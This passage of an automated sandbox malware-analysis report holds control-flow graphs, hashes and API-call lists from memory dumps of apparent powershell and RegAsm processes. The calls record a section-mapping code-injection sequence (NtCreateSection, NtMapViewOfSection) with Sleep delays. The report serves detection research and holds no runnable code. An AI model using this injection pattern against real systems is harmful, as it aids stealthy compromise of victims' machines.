20c2e70-20c2e72 574->576 575->576 576->543 577 20c2e78-20c2e7c 576->577 577->543 578 20c2e82-20c2ea1 577->578 581 20c2eb9-20c2ec4 578->581 582 20c2ea3-20c2ea9 578->582 583 20c2ec6-20c2ec9 581->583 584 20c2ed3-20c2eef 581->584 585 20c2ead-20c2eaf 582->585 586 20c2eab 582->586 583->584 587 20c2f0c-20c2f16 584->587 588 20c2ef1-20c2f04 584->588 585->581 586->581 589 20c2f18 587->589 590 20c2f1a-20c2f68 587->590 588->587 591 20c2f6d-20c2f74 589->591 590->591
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $&;$$&;
                                    • API String ID: 0-3277525272
                                    • Opcode ID: f6b2806c5fea9815feb22f718d379e126acd6043d0d04d978d8c681dd19b8dab
                                    • Instruction ID: 9e6109f6264afa54f15b0725cf3032dbbce3b0056a608c7c0d756eab2673ae93
                                    • Opcode Fuzzy Hash: f6b2806c5fea9815feb22f718d379e126acd6043d0d04d978d8c681dd19b8dab
                                    • Instruction Fuzzy Hash: BA2190B0A00708DFDB6ACF18C8957AE33E1AB54315F24842EEC118BAA0C7B5C880EB41

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 747 20c0f20-20c0f45 748 20c11ba-20c11c0 747->748 749 20c0f4b-20c0f50 747->749 757 20c11e7-20c11ed 748->757 758 20c11c2-20c11e6 748->758 750 20c0f68-20c0f6c 749->750 751 20c0f52-20c0f58 749->751 755 20c1167-20c1171 750->755 756 20c0f72-20c0f76 750->756 753 20c0f5c-20c0f66 751->753 754 20c0f5a 751->754 753->750 754->750 759 20c117f-20c1185 755->759 760 20c1173-20c117c 755->760 761 20c0f78-20c0f87 756->761 762 20c0f89 756->762 763 20c120c 757->763 764 20c11ef-20c120a 757->764 758->757 766 20c118b-20c1197 759->766 767 20c1187-20c1189 759->767 768 20c0f8b-20c0f8d 761->768 762->768 771 20c120e-20c1210 763->771 764->771 769 20c1199-20c11b7 766->769 767->769 768->755 770 20c0f93-20c0fb3 768->770 791 20c0fb5-20c0fd0 770->791 792 20c0fd2 770->792 773 20c12e6-20c12f0 771->773 774 20c1216-20c121a 771->774 779 20c12fb-20c1301 773->779 780 20c12f2-20c12f8 773->780 776 20c121c-20c1238 774->776 777 20c123a 774->777 783 20c123c-20c123e 776->783 777->783 784 20c1307-20c1313 779->784 785 20c1303-20c1305 779->785 783->773 790 20c1244-20c1263 783->790 787 20c1315-20c1330 784->787 785->787 804 20c127d-20c12a2 790->804 805 20c1265-20c126b 790->805 795 20c0fd4-20c0fd6 791->795 792->795 795->755 799 20c0fdc-20c0fde 795->799 801 20c0fee 799->801 802 20c0fe0-20c0fec 799->802 807 20c0ff0-20c0ff2 801->807 802->807 815 20c12a4-20c12ad 804->815 816 20c12c5 804->816 808 20c126d 805->808 809 20c126f-20c127b 805->809 807->755 810 20c0ff8-20c1017 807->810 808->804 809->804 821 20c1019-20c1025 810->821 822 20c1027 810->822 818 20c12af-20c12b2 815->818 819 20c12b4-20c12c1 815->819 820 20c12c8-20c12e0 816->820 824 20c12c3 818->824 819->824 820->773 823 20c1029-20c102b 821->823 822->823 823->755 825 20c1031-20c1053 823->825 824->820 830 20c106b-20c10d0 825->830 831 20c1055-20c105b 825->831 837 20c10e8-20c10ec 830->837 838 20c10d2-20c10d8 830->838 832 20c105d 831->832 833 20c105f-20c1061 831->833 832->830 833->830 841 20c10f3-20c10f5 837->841 839 20c10dc-20c10de 838->839 840 20c10da 838->840 839->837 840->837 842 20c110d-20c1164 841->842 843 20c10f7-20c10fd 841->843 844 20c10ff 843->844 845 20c1101-20c1103 843->845 844->842 845->842
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c94aca230672eca50cf1cf4642ba615391e5f5e3efca14ebdb9824534084c7b3
                                    • Instruction ID: 6e877e11d3b9af78a69bdef217da9bb2dafcd5f75fdfb20ed9640a22f3a32342
                                    • Opcode Fuzzy Hash: c94aca230672eca50cf1cf4642ba615391e5f5e3efca14ebdb9824534084c7b3
                                    • Instruction Fuzzy Hash: 58A145B4704300DBEB269B74845077EB7E2AFC5215F34806ED849DB392DB76C982DBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 934 20c0e8f-20c0ea8 935 20c0eaa-20c0ecb 934->935 936 20c0f11-20c0f45 934->936 947 20c0ecd-20c0ed3 935->947 948 20c0ee5-20c0efc 935->948 937 20c11ba-20c11c0 936->937 938 20c0f4b-20c0f50 936->938 949 20c11e7-20c11ed 937->949 950 20c11c2-20c11e6 937->950 939 20c0f68-20c0f6c 938->939 940 20c0f52-20c0f58 938->940 945 20c1167-20c1171 939->945 946 20c0f72-20c0f76 939->946 943 20c0f5c-20c0f66 940->943 944 20c0f5a 940->944 943->939 944->939 951 20c117f-20c1185 945->951 952 20c1173-20c117c 945->952 953 20c0f78-20c0f87 946->953 954 20c0f89 946->954 955 20c0ed5 947->955 956 20c0ed7-20c0ee3 947->956 958 20c120c 949->958 959 20c11ef-20c120a 949->959 950->949 961 20c118b-20c1197 951->961 962 20c1187-20c1189 951->962 963 20c0f8b-20c0f8d 953->963 954->963 955->948 956->948 966 20c120e-20c1210 958->966 959->966 964 20c1199-20c11b7 961->964 962->964 963->945 965 20c0f93-20c0fb3 963->965 988 20c0fb5-20c0fd0 965->988 989 20c0fd2 965->989 970 20c12e6-20c12f0 966->970 971 20c1216-20c121a 966->971 976 20c12fb-20c1301 970->976 977 20c12f2-20c12f8 970->977 973 20c121c-20c1238 971->973 974 20c123a 971->974 980 20c123c-20c123e 973->980 974->980 981 20c1307-20c1313 976->981 982 20c1303-20c1305 976->982 980->970 987 20c1244-20c1263 980->987 984 20c1315-20c1330 981->984 982->984 1001 20c127d-20c12a2 987->1001 1002 20c1265-20c126b 987->1002 992 20c0fd4-20c0fd6 988->992 989->992 992->945 996 20c0fdc-20c0fde 992->996 998 20c0fee 996->998 999 20c0fe0-20c0fec 996->999 1004 20c0ff0-20c0ff2 998->1004 999->1004 1012 20c12a4-20c12ad 1001->1012 1013 20c12c5 1001->1013 1005 20c126d 1002->1005 1006 20c126f-20c127b 1002->1006 1004->945 1007 20c0ff8-20c1017 1004->1007 1005->1001 1006->1001 1018 20c1019-20c1025 1007->1018 1019 20c1027 1007->1019 1015 20c12af-20c12b2 1012->1015 1016 20c12b4-20c12c1 1012->1016 1017 20c12c8-20c12e0 1013->1017 1021 20c12c3 1015->1021 1016->1021 1017->970 1020 20c1029-20c102b 1018->1020 1019->1020 1020->945 1022 20c1031-20c1053 1020->1022 1021->1017 1027 20c106b-20c10d0 1022->1027 1028 20c1055-20c105b 1022->1028 1034 20c10e8-20c10ec 1027->1034 1035 20c10d2-20c10d8 1027->1035 1029 20c105d 1028->1029 1030 20c105f-20c1061 1028->1030 1029->1027 1030->1027 1038 20c10f3-20c10f5 1034->1038 1036 20c10dc-20c10de 1035->1036 1037 20c10da 1035->1037 1036->1034 1037->1034 1039 20c110d-20c1164 1038->1039 1040 20c10f7-20c10fd 1038->1040 1041 20c10ff 1040->1041 1042 20c1101-20c1103 1040->1042 1041->1039 1042->1039
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3fca81961c1e9d486837a9cee7e678eeaada2609ec29379252ea2c01e44ac000
                                    • Instruction ID: 5eebdc006254096987cdf18d398b1b8bc5e8d716dce5624771d2062c0712c409
                                    • Opcode Fuzzy Hash: 3fca81961c1e9d486837a9cee7e678eeaada2609ec29379252ea2c01e44ac000
                                    • Instruction Fuzzy Hash: 475126B4604385DFEB265B20881077EB7F29F81714F35806ED845AB293DB79C982E761
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453448881.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1ed000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 682cd6aebf47ce61791a3fdf0b122a39761c2bbaac26f9b3a7d7dea0b0b861e0
                                    • Instruction ID: f0f69975a5fa9565a0c56fb0063f378c9eabce57e28c2b90ea9bbd9b0c92066a
                                    • Opcode Fuzzy Hash: 682cd6aebf47ce61791a3fdf0b122a39761c2bbaac26f9b3a7d7dea0b0b861e0
                                    • Instruction Fuzzy Hash: 1B01F730104780EEE7144E16DC8476BFB98DF41764F1CC455FC480F182C3799941CAB1
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453448881.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1ed000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: edb606be5f2777e7d9f50c75ba2273d69a8eb82ae50e4eca55831e7b78a92e52
                                    • Instruction ID: 38026060750264d67ef12b116fe9e2317e2574f38cc325226b6861f9cf3b0434
                                    • Opcode Fuzzy Hash: edb606be5f2777e7d9f50c75ba2273d69a8eb82ae50e4eca55831e7b78a92e52
                                    • Instruction Fuzzy Hash: 1C014C7100E3C09FD7128B259C94B56BFB4DF43624F1D81DBE8888F1A3C2695948CB72
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6d7e353f8cd4ea430c9aa9efd505b64cb8c891bea8e2ffb6202bd5abb52dd19b
                                    • Instruction ID: 5d56fd7bfd702515cb45d9550f7f1873030b8d9167c708d8dd0382f77774e27e
                                    • Opcode Fuzzy Hash: 6d7e353f8cd4ea430c9aa9efd505b64cb8c891bea8e2ffb6202bd5abb52dd19b
                                    • Instruction Fuzzy Hash: 6101DB74700344EFEF29A7A1945067EF391AF88B51B30806EDD09B7342CB768D41D755
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ddea32072888d92bd3934888cc993beb20dde4377ec893a76e209200d1f22a06
                                    • Instruction ID: ae0a66123b93053215111d413bf1bb94346924a3c6bf1d1dac84f07850d94bd8
                                    • Opcode Fuzzy Hash: ddea32072888d92bd3934888cc993beb20dde4377ec893a76e209200d1f22a06
                                    • Instruction Fuzzy Hash: 08E0D871744344CFDF6A776094613AD77D16FA2050F2042BECC5097665CB348805D722

                                    Execution Graph

                                    Execution Coverage:8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:46.7%
                                    Total number of Nodes:60
                                    Total number of Limit Nodes:1
                                    execution_graph 1992 402d65 1994 402d69 1992->1994 1993 4018a6 8 API calls 1995 402ea5 1993->1995 1994->1993 1994->1995 2000 401706 2001 4016ea 2000->2001 2003 401789 2001->2003 2004 4017b4 2003->2004 2007 40328d 2004->2007 2006 4017e8 2006->2001 2009 40327d 2007->2009 2010 40323d 2007->2010 2008 4032a1 Sleep 2008->2010 2009->2006 2010->2007 2010->2008 2010->2009 2096 4018b1 2097 401903 2096->2097 2099 4018b5 2096->2099 2098 4014bf 7 API calls 2097->2098 2101 40191a 2097->2101 2098->2101 2100 4018ee Sleep 2099->2100 2100->2097 2039 4014d6 2040 4014c4 2039->2040 2041 40156f NtDuplicateObject 2040->2041 2050 40168b 2040->2050 2042 40158c NtCreateSection 2041->2042 2041->2050 2043 4015b2 NtMapViewOfSection 2042->2043 2044 40160c NtCreateSection 2042->2044 2043->2044 2045 4015d5 NtMapViewOfSection 2043->2045 2046 401638 2044->2046 2044->2050 2045->2044 2048 4015f3 2045->2048 2047 401642 NtMapViewOfSection 2046->2047 2046->2050 2049 401669 NtMapViewOfSection 2047->2049 2047->2050 2048->2044 2049->2050 1970 402dfe 1971 402dee 1970->1971 1973 402ea5 1971->1973 1974 4018a6 1971->1974 1975 4018b7 1974->1975 1976 4018ee Sleep 1975->1976 1977 401903 1976->1977 1979 40191a 1977->1979 1980 4014bf 1977->1980 1979->1973 1981 4014ce 1980->1981 1982 40156f NtDuplicateObject 1981->1982 1984 40168b 1981->1984 1983 40158c NtCreateSection 1982->1983 1982->1984 1985 4015b2 NtMapViewOfSection 1983->1985 1986 40160c NtCreateSection 1983->1986 1984->1979 1985->1986 1987 4015d5 NtMapViewOfSection 1985->1987 1986->1984 1988 401638 1986->1988 1987->1986 1990 4015f3 1987->1990 1988->1984 1989 401642 NtMapViewOfSection 1988->1989 1989->1984 1991 401669 NtMapViewOfSection 1989->1991 1990->1986 1991->1984 2102 4018be 2103 4018b7 2102->2103 2104 4018ee Sleep 2103->2104 2105 401903 2104->2105 2106 4014bf 7 API calls 2105->2106 2107 40191a 2105->2107 2106->2107 2108 4016be 2109 4016d3 2108->2109 2110 401789 Sleep 2109->2110 2110->2109

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 20 401540-401569 16->20 21 40184b 16->21 17->14 22 40185a-401883 17->22 20->21 31 40156f-401586 NtDuplicateObject 20->31 21->22 29 401874-40187f 22->29 30 401886-4018a3 call 401164 22->30 29->30 31->21 32 40158c-4015b0 NtCreateSection 31->32 34 4015b2-4015d3 NtMapViewOfSection 32->34 35 40160c-401632 NtCreateSection 32->35 34->35 37 4015d5-4015f1 NtMapViewOfSection 34->37 35->21 39 401638-40163c 35->39 37->35 42 4015f3-401609 37->42 39->21 41 401642-401663 NtMapViewOfSection 39->41 41->21 44 401669-401685 NtMapViewOfSection 41->44 42->35 44->21 45 40168b call 401690 44->45
                                    APIs
                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Section$CreateDuplicateObjectView
                                    • String ID:
                                    • API String ID: 1652636561-0
                                    • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                    • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                    • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                    • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 67 401540-401569 63->67 68 40184b 63->68 64->61 69 40185a-401883 64->69 67->68 78 40156f-401586 NtDuplicateObject 67->78 68->69 76 401874-40187f 69->76 77 401886-4018a3 call 401164 69->77 76->77 78->68 79 40158c-4015b0 NtCreateSection 78->79 81 4015b2-4015d3 NtMapViewOfSection 79->81 82 40160c-401632 NtCreateSection 79->82 81->82 84 4015d5-4015f1 NtMapViewOfSection 81->84 82->68 86 401638-40163c 82->86 84->82 89 4015f3-401609 84->89 86->68 88 401642-401663 NtMapViewOfSection 86->88 88->68 91 401669-401685 NtMapViewOfSection 88->91 89->82 91->68 92 40168b call 401690 91->92
                                    APIs
                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Section$View$Create$DuplicateObject
                                    • String ID:
                                    • API String ID: 1546783058-0
                                    • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                    • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                    • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                    • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 110 401540-401569 106->110 111 40184b 106->111 107->104 112 40185a-401883 107->112 110->111 121 40156f-401586 NtDuplicateObject 110->121 111->112 119 401874-40187f 112->119 120 401886-4018a3 call 401164 112->120 119->120 121->111 122 40158c-4015b0 NtCreateSection 121->122 124 4015b2-4015d3 NtMapViewOfSection 122->124 125 40160c-401632 NtCreateSection 122->125 124->125 127 4015d5-4015f1 NtMapViewOfSection 124->127 125->111 129 401638-40163c 125->129 127->125 132 4015f3-401609 127->132 129->111 131 401642-401663 NtMapViewOfSection 129->131 131->111 134 401669-401685 NtMapViewOfSection 131->134 132->125 134->111 135 40168b call 401690 134->135
                                    APIs
                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Section$View$Create$DuplicateObject
                                    • String ID:
                                    • API String ID: 1546783058-0
                                    • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                    • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                    • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                    • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 150 401540-401569 146->150 151 40184b 146->151 147->144 152 40185a-401883 147->152 150->151 161 40156f-401586 NtDuplicateObject 150->161 151->152 159 401874-40187f 152->159 160 401886-4018a3 call 401164 152->160 159->160 161->151 162 40158c-4015b0 NtCreateSection 161->162 164 4015b2-4015d3 NtMapViewOfSection 162->164 165 40160c-401632 NtCreateSection 162->165 164->165 167 4015d5-4015f1 NtMapViewOfSection 164->167 165->151 169 401638-40163c 165->169 167->165 172 4015f3-401609 167->172 169->151 171 401642-401663 NtMapViewOfSection 169->171 171->151 174 401669-401685 NtMapViewOfSection 171->174 172->165 174->151 175 40168b call 401690 174->175
                                    APIs
                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Section$View$Create$DuplicateObject
                                    • String ID:
                                    • API String ID: 1546783058-0
                                    • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                    • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                    • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                    • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 178 4018c5-40190b call 401164 Sleep call 4013cc 188 40191a-401920 178->188 189 40190d-401915 call 4014bf 178->189 192 401931 188->192 193 401928-40192d 188->193 189->188 192->193 194 401934-40194f 192->194 193->194 199 401952-40195b call 401164 194->199 200 401948-40194b 194->200 200->199
                                    APIs
                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                      • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                      • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: CreateDuplicateObjectSectionSleep
                                    • String ID: zOji
                                    • API String ID: 4152845823-4118548424
                                    • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                    • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                    • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                    • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 203 4018a6-4018c3 207 4018d4 203->207 208 4018c8-40190b call 401164 Sleep call 4013cc 203->208 207->208 218 40191a-401920 208->218 219 40190d-401915 call 4014bf 208->219 222 401931 218->222 223 401928-40192d 218->223 219->218 222->223 224 401934-40194f 222->224 223->224 229 401952-40195b call 401164 224->229 230 401948-40194b 224->230 230->229
                                    APIs
                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                      • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                      • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: CreateDuplicateObjectSectionSleep
                                    • String ID:
                                    • API String ID: 4152845823-0
                                    • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                    • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                    • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                    • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 233 4018be-4018c3 237 4018d4 233->237 238 4018c8-40190b call 401164 Sleep call 4013cc 233->238 237->238 248 40191a-401920 238->248 249 40190d-401915 call 4014bf 238->249 252 401931 248->252 253 401928-40192d 248->253 249->248 252->253 254 401934-40194f 252->254 253->254 259 401952-40195b call 401164 254->259 260 401948-40194b 254->260 260->259
                                    APIs
                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                      • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                      • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: CreateDuplicateObjectSectionSleep
                                    • String ID:
                                    • API String ID: 4152845823-0
                                    • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                    • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                                    • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                    • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 263 4018b1-4018b3 264 401903-40190b call 4013cc 263->264 265 4018b5-4018c3 263->265 271 40191a-401920 264->271 272 40190d-401915 call 4014bf 264->272 269 4018d4 265->269 270 4018c8-401900 call 401164 Sleep 265->270 269->270 270->264 278 401931 271->278 279 401928-40192d 271->279 272->271 278->279 282 401934-40194f 278->282 279->282 288 401952-40195b call 401164 282->288 289 401948-40194b 282->289 289->288
                                    APIs
                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
